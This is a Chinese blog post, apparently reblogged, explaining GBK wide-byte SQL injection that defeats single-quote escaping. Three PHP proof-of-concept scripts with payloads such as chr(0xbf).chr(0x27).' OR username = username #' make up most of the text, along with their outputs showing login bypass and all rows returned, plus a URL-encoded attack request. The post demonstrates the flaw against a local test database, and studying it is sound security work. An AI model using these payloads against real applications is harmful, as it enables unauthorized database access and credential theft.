昔日

sql宽字节注入,绕过单引号

Rule:

陈年老酒:



在 GBK编码中, 0xbf27 不是一个宽字符, 但是 0xbf5c 是宽字符. 拆开看, 0xbf27 是 0xbf () 和 0x27 (')的组合, 同时 0xbf5c 是 0xbf () 和 0x5c (\)的组合.所以我们要让系统在过滤单引号时候,插入一个 (\),变成0xbf5c27这就是一个宽字符0xbf5c加上一个 0x27 (')。


这样就产生了注入。

这种做法,其实用的最普遍的就是xss时候,长期会使用到。让系统过滤script同时过滤之后又产生script。

来几个exp,mysql版本5.5.15,php版本5.3.5:


<?php


$c = mysql_connect("localhost", "root", "cr0_3");


mysql_select_db("test", $c);


// change our character set


mysql_query("SET CHARACTER SET 'gbk'", $c);


// create demo table


mysql_query("CREATE TABLE users (


    username VARCHAR(32) PRIMARY KEY,


    password VARCHAR(32)


) CHARACTER SET 'GBK'", $c);


mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);


// now the exploit code


$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username #/*'; 


$_POST['password'] = 'anything'; 


// Proper escaping, we should be safe, right?


$user = mysql_real_escape_string($_POST['username'], $c);


$passwd = mysql_real_escape_string($_POST['password'], $c);


$sql = "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'";


echo $sql;


$res = mysql_query($sql, $c);


//print_r($res);


echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records


mysql_close($c);


?>


输出:SELECT * FROM  users WHERE  username = '縗' OR username = username #/*' AND password = 'anything'2


<?php


$mysql = array();


$db = mysqli_init();


$db->real_connect('localhost', 'root', 'cr0_3', 'test');


$db->query("SET NAMES 'gbk'");


/* SQL Injection Example */


$_POST['username'] = chr(0xbf) . chr(0x27) .' OR username = username #';


$_POST['password'] = 'guess';


$mysql['username'] = addslashes($_POST['username']);


$mysql['password'] = addslashes($_POST['password']);


$sql = "SELECT *


        FROM   users


        WHERE  username = '{$mysql['username']}


        AND    password = 'test'";


$result = $db->query($sql);


echo $sql;


if ($result->num_rows) {


echo 'Success';


    /* Success */


} else {


    /* Failure */


echo 'Failure';


}


?>


输出:SELECT *        FROM   users        WHERE  username = '縗' OR username = username #        AND    password = 'test'Success


<?php


$conn=mysql_connect("localhost","root","cr0_3");


mysql_query("SET NAMES 'GBK'");


mysql_select_db("test",$conn);




$_GET['user'] = chr(0xdf) .chr(0x27).' OR username = username #';


//$_GET['pass'] = 'guess';


$user=mysql_escape_string($_GET['user']);


$pass=mysql_escape_string($_GET['pass']);


$sql="select * from users where username='$user' and password='$pass'";


$result=mysql_query($sql,$conn);


echo $sql;


echo mysql_num_rows($result);


$rows =  array();


while ($row=mysql_fetch_array($result, MYSQL_ASSOC)) {


$rows[]=$row;


}


print_r($rows);


?>


输入:http://localhost/exp3.php?user=%df%27%20or%201=1%20limit%201,1%23&pass=

输出:select * from users where username='運' OR username = username #' and password=''2

评论

热度(2)

  1. 昔日Rule 转载了此文字
  2. Rule陈年老酒 转载了此文字